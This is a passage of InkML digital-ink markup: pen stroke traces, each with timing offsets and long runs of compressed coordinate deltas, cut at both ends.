4-4 0,1-3-1 16,-2 2 5-16,0 3-8 0,3-1-1 0,-3 1 6 15,3 1 0-15,1-1-3 0,-3 0-1 0,2 0 1 16,-2 0 2-16,3 2-1 0,0-3 2 0,0 0-4 15,0-2-7-15,3 1 8 0,-3-2-2 0,1 2 3 16,2-2-3-16,-2-2-1 0,-1 0-2 0,1 2 7 16,2-2-2-16,-3-3 0 0,5 1 4 0,-5-1 4 15,15 0-2-15,-3-3 4 0,1 0-4 0,-2-3 5 16,7-1-3-16,-3-2 0 0,1 2 0 0,-2-6 1 16,2 3 1-16,-5-4 0 0,0-1-3 0,1-1-2 15,-3 2 2-15,0-2-13 0,-1 2-19 0,-4 2-29 16,0 0-65-16,0 0-50 0,-4 2-123 0,-3 2-314 15,2-1 139-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="17571.5948">22865 3365 31 0,'0'0'106'16,"0"0"1"-16,0 0-16 0,3 3-12 0,-3-3 5 16,0 0-14-16,0 0 2 0,20-3-20 0,-7 1-1 15,0 0-9-15,5 1 9 0,-3-2-18 0,3-1 15 0,-2 0-17 16,-2 1 5-16,6-2-5 0,-6 1 5 0,6-1-8 15,-6 0 4-15,-1 1 10 0,-4-3 3 0,1 1-5 16,-1-3 0-16,-1 0 0 0,-2-1-7 16,-2 0 7-16,0-2-9 0,-4-1-3 0,0 0-9 15,-4 3 7-15,-5-6-1 0,4 5-8 0,-4-3-3 16,0 5 5-16,-1-1-7 0,-7-2 4 0,2 3-3 16,-2 1 2-16,5 4-13 0,3 0 4 0,1 1 5 15,-2 0-9-15,3 3-1 0,-2 0-4 0,4 2 2 16,0 2-3-16,-1 2 2 0,2 1-1 0,-1 5-2 15,4 0 2-15,2 0 3 0,0 7 9 0,4-4-14 16,3 4 4-16,-1-1-4 0,0 1 2 0,6 3-2 16,-2-7-4-16,-1 1-4 0,1-1-14 0,1-2-32 15,1 1-16-15,1-2-14 0,-5-5-15 0,8 8-16 16,-6-9-68-16,1-1-201 0,2-1 89 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="17996.211">23494 3259 95 0,'0'0'107'0,"0"0"-11"16,2-4-8-16,-2 4-7 0,0 0-5 0,0 0-13 16,0 0 1-16,0 0-2 0,-13 8 2 0,4 2-5 15,-6 2 8-15,-6 4-21 0,0 2-6 0,5-4 6 16,-6 0-13-16,5 0 3 0,5-1-8 0,0-2-3 15,-1 1 2-15,4-2-8 0,3-2 0 0,-3 0-11 16,5 1-4-16,0-1 5 0,-1 0-10 0,5-3-13 16,-4 1 3-16,7 0 5 0,-2-2 3 0,2 0-2 15,2-1 4-15,0 0-7 0,1-3-3 0,7 2 5 16,-1-5 3-16,2-1-3 0,3-1 4 0,3-4-9 16,0 1 10-16,-2-2-4 0,1 1 1 0,-2-3-6 15,-2 2 15-15,3 2-2 0,-4-2-3 0,1-1 2 16,-2 6-3-16,-2-2 6 0,-1 2 1 0,1 0 5 15,-4 2-3-15,-1-1 4 0,0 2-7 0,-2 0-15 16,-4 2 8-16,7-3-9 0,-7 3 11 0,6 1-4 16,-6-1 7-16,5 6-1 0,-1 0 7 0,-2 0-2 15,0 3 5-15,-1-1 4 0,-1 5 5 0,-3 2-3 16,1-4 0-16,-2 1 7 0,2 1 1 0,-2-2-11 16,-3 3 3-16,3-2-3 0,-1 0-1 0,-1-2-3 15,1 4-17-15,-1-2-32 0,0-1-37 0,0-3-34 16,0 4-89-16,-1-4-214 0,2-4 95 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="18431.7349">24439 3428 62 0,'0'0'150'0,"0"0"-11"0,0 0-9 16,0-5-12-16,0 5-19 0,0 0-10 0,0 0-10 16,0 0-12-16,0 0 3 0,-17 15-1 0,-1-2-10 15,-4 6 6-15,-6 3-14 0,-10 11-7 0,1 1 3 16,9-10 0-16,-10 7-7 0,12-7-5 0,0 1-2 15,4-3-6-15,3 0 2 0,1-2-6 0,4-6-7 16,-1 5-6-16,2-6-23 0,2-1-16 0,2-2-32 16,2-1-29-16,1-2-10 0,1-1-11 0,1 0-7 15,0-1-62-15,0-4-194 0,3 3 86 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="18765.9783">24414 3415 87 0,'4'5'112'16,"1"-1"-2"-16,3 2 0 0,1 2-1 0,2 0-12 16,-1-1-7-16,6 3-14 0,-6 0-3 0,4-1-10 15,1 1-6-15,-2-1-3 0,1 2-8 0,2-2-1 16,-2 1-1-16,1 2-7 0,-5-7-4 0,0 3 1 16,2 0-8-16,-1 0 0 0,0-1-6 0,-1 1-4 15,0-4-12-15,-4-2-3 0,3 3-12 0,-3-1-24 16,0-3-8-16,-4 1-12 0,1 0-13 0,-1 1-14 15,-2-3-11-15,0 0-72 0,-7 5-177 0,-6-5 80 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="19001.694">24317 3753 16 0,'13'4'58'16,"-2"2"5"-16,3-1-18 0,3 0-7 16,1-2-2-16,-4 2-12 0,1-1-7 0,5-1-8 15,-3 1-5-15,-4-1-10 0,0-3-7 0,0 3-5 16,1-1-3-16,-3-1-3 0,1 2-14 0,-3-2-42 15,-2-1 19-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="19598.6458">24662 3405 99 0,'-1'-7'97'0,"-1"2"5"0,2-3-22 0,0 2-8 15,0 0-8-15,-1-4 2 0,-1 0 3 0,-1 1-2 16,1 0 3-16,-1 2-5 0,-1-1-4 0,2 1 1 16,-5 0 9-16,5 0 8 0,-1 2-10 0,-2 2-4 15,1-1-5-15,3 1-6 0,-2-1-9 0,3 4-5 16,-6-5-5-16,6 5-5 0,-13 5 3 0,-3 3-6 15,-9 7-6-15,-7 9 4 0,-7 1 1 0,-4 7-5 16,-1-2-15-16,0 2 14 0,-2 1-4 0,2 2-4 16,-2 0-1-16,2 0-11 0,4 0-7 0,-2-3-18 15,8 2 3-15,6-6-6 0,2-8-8 0,4 2-7 16,1-4-10-16,4-3-12 0,7-2-6 0,-3 0 4 16,4-6-11-16,-2 2-11 0,2-3-13 0,-1 1-74 15,2-3-191-15,1-1 85 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="19845.7124">24184 3559 42 0,'26'20'62'0,"-2"-1"-2"0,0-1-12 16,1 0-2-16,-2-1 4 0,1-2-30 0,-3 1-25 16,-4-6-18-16,2 0-27 0,-3 2-55 0,-4-5 25 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="20309.7093">24616 3677 50 0,'0'0'75'0,"0"0"-9"0,0 0-2 0,0 0 1 0,-17 14-12 15,6-4-1-15,-1 3-11 0,-3-2 0 0,2 2 12 16,-3 2-19-16,4 1-3 0,1-3-3 16,-1 1-3-16,6-3-2 0,-2 2 2 0,3-2-8 15,-1-2 0-15,3 1 0 0,2 0-4 0,-2-1 1 16,3 0-5-16,0-4 4 0,2 1 0 0,0-2-4 0,3 3 9 16,-2-4 10-16,2 1 1 0,1-2 13 0,2 0 5 15,1 0 5-15,0-2 1 0,4-3 1 0,4 0-6 16,0-3-4-16,1-2-2 0,-3-1-4 0,-1 6 15 15,-2-4 9-15,1 0 0 0,-6 3-8 0,1-2-6 16,0-1 2-16,-1 3-6 0,-2-1-2 16,2 1-1-16,-5 1 1 0,2 0-3 0,-1 1-5 0,-3 2-4 15,6-4-4-15,-6 4-5 0,3-1-2 0,-3 1-8 16,0 0 0-16,0 0 3 0,2 10-4 0,-6-1 1 16,-6 5 2-16,0 3 6 0,0 0-4 0,-4 5-4 15,2-7 1-15,2 3-1 0,0-1-2 16,2-2 0-16,0 2-1 0,2-5-3 0,-2-2 1 0,5 3-3 15,0-2 4-15,-1-1-6 0,0-1 7 0,3 1-7 16,-3-2-6-16,-1-1-10 0,3 0-17 0,0-1-27 16,2 0-14-16,-1 0-31 0,1-2-35 15,-3-1-18-15,2 1-114 0,-1-1-292 0,2-3 129 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="20814.1587">21757 3191 8 0,'49'34'94'0,"-2"1"-16"0,3 1 6 16,24 12-4-16,-27-15-5 0,6 2-4 0,-1 0-3 16,22 13-6-16,-24-16 4 0,28 14 0 0,-24-14-3 15,-2-1-14-15,3 2 11 0,22 14 1 0,-29-11-5 16,3-6-2-16,-5 5-3 0,0-2-3 0,0 0-3 16,0 4-6-16,-2-4-9 0,1-1 1 0,-3 0 2 15,-4 1-3-15,4-1-6 0,-10-9 0 0,7 10-4 16,0-5 0-16,-9-7 2 0,2 1-2 0,12 5-6 15,-13-8-3-15,2-1 1 0,11 5 1 0,-11-5-4 16,1-1 7-16,3-2-6 0,-2 0 0 0,-3 0-5 16,1-2-4-16,-1-1-16 0,-3-2-21 0,-1 0-24 15,-1-2-32-15,-6 0-35 0,-6-3-91 0,-2 0-235 16,0-2 105-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="39599.412">9175 7629 128 0,'0'0'151'0,"0"0"-14"0,0 0-20 16,0 0-2-16,0 0-10 0,14-6-15 0,-5 5 1 16,3-2-6-16,1 2-13 0,0-1-9 0,3 0-1 0,4 3 1 15,1-1-20-15,-2 3 11 0,1 2-2 0,8 3-7 16,-7-1 8-16,6 1-12 0,-8 0-1 0,3-1 3 16,4 5-5-16,-1 1 5 0,2-4-3 15,0 5 1-15,-1-1-12 0,5-2-1 0,-3 2 2 0,4 2 2 16,-1-2-1-16,3 2-4 0,2-1-2 15,13 2-3-15,-2 4-7 0,-8-5 7 0,10 2-3 0,5-2 0 16,-1-1 2-16,4 4-5 0,-2-1-5 0,2-3 2 16,-3 0-4-16,3 3 2 0,-1-5-3 0,-3 3 0 15,-2-4-1-15,0-1-7 0,-11-3 8 0,-2 0-3 16,1 0-3-16,-3-1-7 0,0-2-14 0,-3 1-15 16,-3-2-35-16,-2-1-41 0,-1 0-52 0,-8-2-144 15,0-2-330-15,-9-2 146 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="41542.138">10916 6191 25 0,'0'0'181'0,"1"-5"1"0,-1 5 4 15,4-2 0-15,-4 2 0 0,6-2-9 0,-6 2-9 16,0 0-9-16,0 0-12 0,4-1-9 0,-4 1-9 16,0 0-8-16,0 0-10 0,0 0-11 0,0 0-9 15,0 0-7-15,0 0-9 0,0 0-8 0,0 0-7 16,3 5-2-16,-3 1-3 0,-3 1-3 0,-1 2-16 16,-2 2-4-16,2 1-1 0,-1 2-3 0,-3 2-2 15,1 2-4-15,-1-1 1 0,-1-3-6 0,3 3 1 16,0 1-4-16,-4 5 0 0,1-4 1 0,4-1-2 15,-6 6 0-15,2-8 0 0,1-2-3 0,3-4-4 16,1-2 1-16,2-2-4 0,0 0 1 0,0-2-3 16,-1 2 4-16,1-3-6 0,1 1-6 0,1-4 2 15,0 0-7-15,-2 6 0 0,5-4-4 0,-3-2 3 16,0 0 4-16,0 0 1 0,18-11-1 0,-7 1 2 16,4-4-8-16,3-4 4 0,-4 5 2 0,-2-1 1 15,12-6-2-15,-2 1 2 0,-7-2-4 0,6 1-2 0,-2 3 2 16,-8 1 1-16,4 1 1 0,-2 1 2 0,0 0 0 15,0 0-3-15,-3 0-1 0,-2 6-1 0,5-6 7 16,-6 7-7-16,1-3 6 0,-1 2 1 16,1 1-3-16,-4 2 2 0,0 0-1 0,1 1-1 0,-1-1 5 15,1 2-3-15,-2 2 0 0,-3 1-2 0,3-3-5 16,-3 3 2-16,3-3 3 0,-3 3-1 16,0 0 2-16,0 0-3 0,6 11 9 0,-2-1 2 15,-4 1 0-15,-1 0 1 0,-2 7-2 0,2-1-2 16,0 1 0-16,-2-1-1 0,2-4-1 0,-2 4 5 0,2-2 0 15,1 4 1-15,-5-7 2 0,5 3-3 0,-1-1 0 16,1-3-3-16,0 0 3 0,1 0-1 0,-1-1-1 16,0-4 1-16,0 1-5 0,3-1 2 15,-1-2 1-15,2 2-4 0,0-3 2 0,1-2 1 0,0 1 1 16,4-2 3-16,5-6-6 0,2-1-1 0,1-1-1 16,8-3 1-16,-4-5-2 0,-3 7 0 0,-1-1 3 15,-2 0 1-15,0 0-6 0,-3 4 5 0,-2-1 2 16,4 1 1-16,-6 0-1 0,0 0-2 0,-2-1 4 15,-1 4 0-15,0 0-3 0,-2 0 5 0,1 1 1 16,-4 2 0-16,5-3 1 0,-5 3-2 0,4-1-3 16,-4 1 3-16,0 0 7 0,5-2-8 0,-5 2 1 15,0 0 3-15,0 0 8 0,5 7 11 0,-4 0-2 16,-1-2 3-16,-1 2 8 0,2 3-4 0,0 0-9 16,-3-1-1-16,2 1 2 0,0-3-4 0,-2 5 2 15,4-2-4-15,-2 2-2 0,0-4 2 0,1 3 1 16,-1-1-6-16,1 1-5 0,1-1-10 0,-2-3-25 15,1 0-20-15,1 3-30 0,-3-5-15 0,2 3-15 16,1-3-23-16,-1 0-24 0,2-1-18 0,-3 0-17 16,0-4-99-16,1 4-317 0,-1-4 141 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="41850.1228">11633 6225 70 0,'0'0'168'0,"0"0"1"15,0 0 12-15,2 9 0 0,-2-1 4 0,-1 0-9 16,0 3-12-16,-3-5-14 0,4 7-9 0,0-1-3 15,-1 2-16-15,-2-2-8 0,-2 1-4 0,2 3-15 16,1 0-9-16,-2-1-12 0,0 2-6 0,2-5-14 16,-2 0-19-16,-4 4-20 0,6-4-22 0,-2-2-22 15,1-2-19-15,-1-3-25 0,3 1-12 0,1-1-3 16,-4 0-12-16,4-4-7 0,0-1 1 0,0 0-2 16,0 0-21-16,3 4-15 0,-3-4-2 0,0 0-75 15,9-12-240-15,-8 9 106 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="42171.2538">11794 6279 34 0,'0'0'116'16,"0"0"13"-16,1 8 5 0,-1-3 2 0,0 0 4 15,-4 0-9-15,0 2 0 0,3 0-8 0,-4 2-1 16,0 3 3-16,-4 2 4 0,-1 1-8 0,0 1-12 16,-2-2 1-16,-2 3-1 0,-4 2-7 0,4-1-3 0,-3 1-2 15,-3-2-10-15,5-4-6 0,-5 5-5 16,-1-3-7-16,4-2-2 0,-6 5-4 0,4-11-1 16,4 4-2-16,-4 0-1 0,0-1-11 0,3 2-4 0,-1-2-4 15,-1-1-3-15,2 2-2 0,-2-1-6 0,0 0-5 16,4-1-5-16,2-3-11 0,2-2-8 15,5 0-19-15,-3-2-15 0,3 2-25 0,-1-2-22 16,2 2-23-16,-1-4-21 0,2 3-11 0,3-3-17 16,0 0-14-16,0 0-27 0,0 0-146 0,0 0-366 0,4-13 162 15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="42697.5165">11950 6553 73 0,'0'0'186'0,"0"0"-7"16,0 0-2-16,0 0-15 0,0-3-5 0,0 3-8 15,0 0-11-15,-3-6-2 0,3 6-7 0,0 0-5 16,-4-2-3-16,4 2-7 0,0 0-9 0,-6-4-6 16,6 4-5-16,0 0-6 0,0 0-9 0,-2-2-4 15,2 2-3-15,0 0-7 0,0 0-5 0,0 0-7 16,0 0-6-16,0 0-7 0,0 0-1 0,0 0-9 15,0 0-3-15,0 0 1 0,0 0-6 0,0 0-7 16,0 0 2-16,0 0-7 0,0 0 2 0,0 0 2 16,0 0-4-16,15 7 5 0,-9-6-4 0,-1 1 3 15,4 2 3-15,-4 0 6 0,0-2-10 0,4 3-1 16,-1-2-3-16,2 0 2 0,-1 2 1 0,3 0 1 16,-1-1 5-16,1-2-1 0,2 2-4 0,-1 1-2 15,6 0 1-15,-3-2-2 0,2-1 3 0,0 2-5 16,-1-1 1-16,-1 1 7 0,1-3-10 0,-7 0 1 15,4 0-1-15,-2 1 3 0,-2-2-5 0,-1 1 1 16,1-2-7-16,0 2 0 0,-2-1-16 0,-3-1-11 16,0-1-16-16,-5 2-19 0,11-3-29 0,-5 0-27 15,-1-2-18-15,0 2-36 0,-1-2-14 0,1 1-26 16,-2 0-149-16,1-2-392 0,-3 0 174 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43285.3233">12681 6136 141 0,'2'-2'149'0,"-2"2"3"0,0 0-4 16,4-5-5-16,-4 5-8 0,0 0-10 0,0 0 5 15,0-6-8-15,3 4-5 0,-3 2-4 0,1-4-1 16,-1 4-1-16,0 0-1 0,1-3-6 0,-1 3-8 15,0 0 2-15,0 0-5 0,0 0-3 0,-1-4-3 16,1 4-5-16,0 0-1 0,0 0-10 0,0 0-3 16,0 0-9-16,0 0-6 0,-9-8-11 0,3 7-2 15,2-1-7-15,-1 0-2 0,1 0-9 0,-4 2 7 16,3-2-7-16,-2 1-7 0,7 1 0 0,-10-4-1 16,10 4-3-16,-9 4-4 0,6-1 0 0,-5-1-2 15,0 3 1-15,-1 5-1 0,0-4-2 0,1 4-2 0,0 0 0 16,-2 2 3-16,-2 3 1 0,4-5-5 0,-1 4 0 15,3-2 7-15,0-2-11 0,-2 6 1 16,2 0 3-16,-1 1-1 0,1 0 3 0,-3-1 0 16,5 0 0-16,-2 0-1 0,-1 3 0 0,1 0 0 15,-3-3 1-15,4 2 0 0,-2-1-2 0,2 3 2 0,-6-3-4 16,5 7 3-16,-1-10-1 0,1 3 2 0,-2-3 1 16,3 2 2-16,-3-1-3 0,1-1-5 15,-2-1-2-15,1 0 0 0,3-2-8 0,-2-2-2 16,2 1-6-16,-1 0-9 0,0-3-15 0,-1 1-12 0,5 0-16 15,-4-2-16-15,3-2-18 0,-1 0-20 0,0-1-17 16,2 0-21-16,2-3-25 0,-7 2-151 0,7-2-370 16,0 0 165-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="43566.1135">12403 6211 105 0,'5'6'145'0,"5"-2"-7"0,0 2 3 0,1-1-3 16,-2 0-10-16,0 2-2 0,1-1-7 0,3 3-12 15,-4-2-12-15,2 4-4 0,-1-5-12 0,-1 2-6 16,2 0-4-16,-2 2-13 0,1-3-4 0,0 1-22 16,-1 0-29-16,-1-2-33 0,0 2-13 0,-1-3-25 15,2 0-29-15,-4-2-22 0,1 1-100 0,-3 0-240 16,2-2 106-16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44094.7486">12673 6360 123 0,'-1'6'127'0,"-3"-2"0"0,0 5-5 0,-4 0 10 15,3 2-8-15,-5 1-6 0,2 2-14 0,3-4-11 16,0 2-3-16,0-2-15 0,0 0-4 0,1 1-12 16,2-2-3-16,0 1-11 0,1-2-4 0,1-2-1 15,1 1-2-15,3-1-8 0,-4-2-6 0,4 2 2 16,1-3-8-16,0 1-3 0,-1-2 2 0,1 0 3 16,4-1-9-16,0-1 0 0,0 0 3 0,1-2-9 15,3-1 9-15,-3-2-9 0,1 0 6 0,-1-1-2 16,-1 2-4-16,0-3 0 0,1 1-1 0,-1-1-1 15,-3-3 3-15,2 2 4 0,1-2-4 0,-3 1 2 16,1-1-4-16,-2-1 5 0,0 2-1 0,1-1 11 16,-1 0-1-16,-2 1 2 0,3-1-1 0,-2 2 2 15,-3 3 9-15,3-3 6 0,0 1-5 0,-3 0 0 16,3 3-3-16,-1-1-1 0,-1-1-1 0,-2 1-5 16,4 2 0-16,-4-1 0 0,0 4-3 0,1-5 0 15,-1 5-6-15,4-4 2 0,-4 4-3 0,0 0-10 16,0 0 2-16,0 0-5 0,0 0 3 0,0 0-3 15,0 0 8-15,4 11-2 0,-8-1 6 0,2 2 3 16,-1 7-2-16,-3 0 2 0,-1 0 2 0,2 1-6 16,0-4-1-16,1 1-5 0,0-1 1 0,0 1-2 0,1 0 3 15,-4 0-16-15,4-7-21 0,0 2-26 16,0 1-16-16,1-3-12 0,-1-3-27 0,2 0-17 16,1-1-16-16,0-3-4 0,-1 4-122 0,2-5-294 15,-1-2 130-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44607.6755">12993 6368 162 0,'1'3'155'0,"-2"3"-11"0,-2 3-6 0,0 0-3 16,-2 1-1-16,2 0-11 0,-1 4-5 15,-3 2-4-15,1-1-6 0,-3-2-9 0,4 0-9 16,-3-3-3-16,2 5-10 0,-3-2-7 0,3-2-9 0,-1-4-9 16,3-1-6-16,3 0-4 0,-3 1-6 0,3-4-4 15,-2 0-2-15,3 0-3 0,-1 1-6 0,1-4-8 16,-4 6-4-16,4-6-6 0,0 0 0 15,5 2 3-15,-5-2-2 0,0 0-4 0,13-5 0 16,0 0-5-16,-3-3-1 0,-1 3 1 0,2-3 5 0,0 1-5 16,-1-1-3-16,3 0 2 0,-3-1-5 0,2-1 2 15,0 4 0 1,-3-2 5-16,2 0-1 0,-1 2 3 0,1 0 1 0,-2 0-7 0,5 0 2 0,-5 0-2 16,0-1 1-16,1 2-2 0,-3 1 7 0,-2-2 1 15,1 5-2-15,2-2-5 0,-4 1-2 0,-1-2 3 16,-3 4 3-16,8-1-4 0,-8 1 5 0,0 0-6 15,9 1 11-15,-9-1 7 0,8 6 4 0,-7-3 13 16,0 4 9-16,-1 0 1 0,-1 2 1 0,-2 4 3 16,0 0-5-16,-1-3-3 0,0 2-3 0,-1-2-1 15,1 2-4-15,3-1 1 0,-6 4-1 0,0-1-4 16,2 2-5-16,-2-3-11 0,6-7-26 0,-3 5-28 16,4-2-20-16,-1 0-19 0,2-3-33 0,-1 0-20 15,4-3-21-15,0 0-128 0,1-1-316 0,0-1 140 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="44935.8456">13492 6441 160 0,'0'0'184'0,"0"0"-22"0,0 0-3 16,0 0-5-16,-19 4-15 0,13-1-10 0,-2 0 2 16,0 5-6-16,-4-3-5 0,4 1-10 0,-2 0-8 15,0 1-5-15,1 3-11 0,-2-2-5 0,1 2-9 16,-1 0-7-16,0 3-6 0,3-4-4 0,1 2-4 16,-2 4 0-16,5-3-5 0,-6 3-4 0,6 0-7 15,0-2 2-15,3-2-8 0,1 1-2 0,0 5 0 16,1-7-6-16,3 2-3 0,2-1 0 0,2 2-7 15,1-2-13-15,-1-1-14 0,2-4-8 0,-1 2-12 16,3-3-7-16,-1 1-13 0,2-1-21 0,-3-1-16 16,-2-1-9-16,3-3-26 0,-2 3-13 0,-9-3-10 15,12-3-20-15,-6 2-90 0,-1-2-282 0,-5 3 124 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="45684.4478">11188 6605 47 0,'0'0'114'0,"0"0"-2"0,0 0-4 0,0 0-1 16,0 0-6-16,0 0-6 0,0 0-8 0,0 0 7 15,0 0-11-15,0 0-12 0,0 0 1 0,0 0-6 16,0 0-10-16,0 0-8 0,0 0-7 0,0 0-4 16,0 0 4-16,8 10 6 0,-3-7-2 0,-4 1 6 15,5 1-3-15,0 0-1 0,1 1 0 0,5 1 2 16,-2-1 0-16,4 4 9 0,5-2 4 0,-1 1 4 16,3-2 1-16,-1 1-7 0,8 1-6 0,-1 2-8 15,0-2 2-15,-2 4-7 0,4-3-5 0,-3-3 0 16,2 1-7-16,3 0-3 0,-3 1-2 0,5 0 1 15,-2-2 0-15,8 0-4 0,-6-1-1 0,2 2-1 16,0 0-4-16,-2-3-5 0,-3-1 5 0,-4-1-5 16,0-2-21-16,-6 2-28 0,-2 0-30 0,-5 0-60 15,1 0-66-15,-5 0-161 0,-4-2-385 0,-5-1 171 16</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="55056.0512">11901 5771 56 0,'-6'-14'70'0,"2"2"-5"15,-1 1-1-15,0-2-4 0,1 3 5 0,-2-2-14 16,-2 2-1-16,3-1 3 0,-3 1-3 0,1 2-2 16,-1-2-8-16,-1 2-3 0,1-2 0 0,-2 5-4 15,2-3-7-15,-1 0 4 0,-1 4-15 0,-1-4 3 16,2 1-2-16,-3 3 1 0,3-2-5 0,-2 1 3 16,-3-2 0-16,2 4 0 0,-1-3-3 0,-3 1 4 15,-1 2-3-15,-1-3-6 0,-1 2-2 0,0-2 0 16,-3 0 0-16,-5 0 8 0,-3 1-6 15,8 2-3-15,-5-2-2 0,-2 0 1 0,0 0 1 0,0 2 0 16,-3-1 7-16,5 4-11 0,-1-6 6 0,-1 5 2 16,1-1-3-16,0 0 2 0,6 1 4 0,-5 1-10 15,0-2 4-15,4 2-2 0,2 0-1 0,-8 0 1 16,0 0 10-16,-3 2-9 0,4 1-1 0,6-1 3 16,-1-1-3-16,4 3 3 0,-3-2 0 0,3 3-4 0,0-2 3 15,6-1-3-15,-1 1-1 0,1 1-3 16,2-2 0-16,-2 2 9 0,1 1-7 0,0-3 6 15,2 4-9-15,-1 0-3 0,0 0 3 0,-1 2 3 0,3 1-1 16,-1 0 7-16,2 1-14 0,-2 4 16 0,0 2-13 16,1 2 12-16,0 0-12 0,0 0-1 15,-2 5 6-15,4-4 15 0,2-1-15 0,-1 6 3 0,1-4-3 16,2 1 7-16,-1 4-5 0,3 0-10 16,0 1 21-16,1-2-10 0,0 4 0 0,0-2 2 0,0-2-2 15,2 6-6-15,1-3 5 0,0 2 1 0,3-2-2 16,-1 1 5-16,1 1 12 0,2-1-15 15,-2-1 0-15,4 1-2 0,2 0 2 0,-2 0 3 0,3-1-12 16,1 2 8-16,0-3-5 0,-1 3 6 0,2-3 3 16,-2 2-14-16,4-3 9 0,-3-1 4 0,2 1-1 15,-3-1-14-15,-1-1 18 0,0-6-4 0,3 4 3 16,-3-5-1-16,2 0-6 0,0-1 2 0,-1 2 7 16,9 0-3-16,0-2-2 0,-6-3 3 0,2-1-9 15,0 2 18-15,0-1-10 0,4 1-1 0,-4-5-6 16,3-1 3-16,-3 1 2 0,9 2 9 0,1 0-6 15,3 0 4-15,-3-4-4 0,3 4 7 0,-1-1-3 16,3-5-2-16,2 4-1 0,2-1-2 0,-1-3 2 16,0 4 1-16,-1-6-5 0,2 3 7 0,2-2-4 15,-2-1-4-15,-4 4-11 0,3-3 14 0,-6 2-5 16,1 3-6-16,-1-5 3 0,-1 5 6 0,-2-3 0 16,-8 0-1-16,4 0-5 0,-4-1 1 0,-1 0 1 15,2 1 4-15,0 1-2 0,1-1 0 0,1 2-4 16,-4-2-2-16,5 3 2 0,4 0 3 0,0 0 0 15,-7-5 0-15,1 5 2 0,5 1-1 0,1 2 3 16,0-3-4-16,-8 1-9 0,8 0 6 0,-6 1 1 16,4-1 4-16,-1 0-12 0,-4-2 11 0,0 2-1 15,7 0-4-15,-7-3 3 0,6 4 3 0,2-2-6 16,-2 0 0-16,2-1 9 0,-2 1-7 0,0 0 2 0,-8-5-7 16,10 4 8-16,-8-2-9 0,1 0 12 15,1-1-4-15,-2 0 3 0,0 2 0 0,1-3 1 16,7 1-6-16,-7 0-2 0,-2 2 5 0,3-4-2 15,-1 1 0-15,1 1-3 0,0 0 3 0,-2 0 2 0,2 0-4 16,-2-4 2-16,2 3 1 0,1-3 4 0,-4 0 2 16,0 0-9-16,-1 3 0 0,1-3 7 0,-1 3-1 15,0-2-7-15,-4-1 0 0,6 1 13 16,-1-3-9-16,1-1 7 0,-1 0-5 0,4 2 3 0,0-1-15 16,-1 0 13-16,-3 1 6 0,-4-1-4 0,2-1 6 15,-3 0-8-15,-2 1-4 0,1 1 0 0,-1-1 7 16,1-1 1-16,0 3 3 0,-2-4-6 0,0-2 7 15,1 2 2-15,0-1-3 0,-1 2 1 0,-1-3 7 16,1 1 4-16,1-1-3 0,3-4 2 0,1 1-5 16,-2-2 5-16,-1 0-5 0,-3 2 2 0,2-2-1 15,-2-2-3-15,0 0 3 0,-2-3-1 0,0 2-2 16,0 2 4-16,0-5-5 0,-1-2 3 0,-1 2-2 16,-2 2-6-16,-1-2 6 0,3 0-5 0,-4 0 0 15,2 0 2-15,-1 0-6 0,-1 0 0 0,-2-1 1 16,2 0-1-16,-1-1 0 0,1-1-6 0,0-5 5 15,-1 0 0-15,-1 0-6 0,0 0 1 0,0 0 2 16,-3 2-5-16,3 2 2 0,-1 2 2 0,0 0 2 16,1 1 0-16,-3 3 0 0,2-3-3 0,-2-1 2 15,2 2 1-15,0-1-2 0,-2 0 3 0,1 0-5 0,0 0 3 16,-3 0 3-16,4 3 3 0,-1-2-2 16,-1 0-3-16,0 1 0 0,0-2-3 0,0 1-1 15,-1 0 2-15,2 2 2 0,-1 1 1 0,-1-3-4 16,-1-1-2-16,0-1 5 0,1 1-6 0,-2 2-1 0,1-1 10 15,-3-1-4-15,3 2 2 0,-3-4 3 16,2 5-5-16,-3-2 2 0,-5 2 4 0,2-1-6 16,-3-4-1-16,2 4 2 0,-9-3-2 0,10 4 3 15,-6-6-1-15,-4 1-3 0,2 2 3 0,-2 1-3 0,-1-1 5 16,-2 0-9-16,5 3 8 0,-3-4-1 16,0 3-3-16,-4-1 0 0,6 2-5 0,-6-2 4 15,5 2 4-15,-2 1-3 0,7 2-1 0,-2 0 2 16,2 1-4-16,-6-4 1 0,6 4 4 0,0-2-5 0,0 3 1 15,2 0 1-15,1 1 3 0,4 2 1 0,-7-3-1 16,3-1-4-16,1 2 1 0,2 1 3 0,2 1-8 16,-3 1 7-16,2-4 2 0,-3 4-7 15,-1-2 2-15,0-1 3 0,1 0 1 0,3 4-1 0,-7-3 2 16,6 2 1-16,1-1 1 0,-1 0 1 0,-3-4-3 16,-1 4-2-16,0-3 0 0,-2 3 3 0,3-2-1 15,1 3-3-15,-2-4-1 0,1 3 3 0,-4 0-3 16,3-1 4-16,-1 0-4 0,0 1-2 0,3 3 0 15,0-1 0-15,-3-1 1 0,4 0-7 0,-6 1 6 16,3-1-1-16,1 4 3 0,4-2 1 0,-1 3 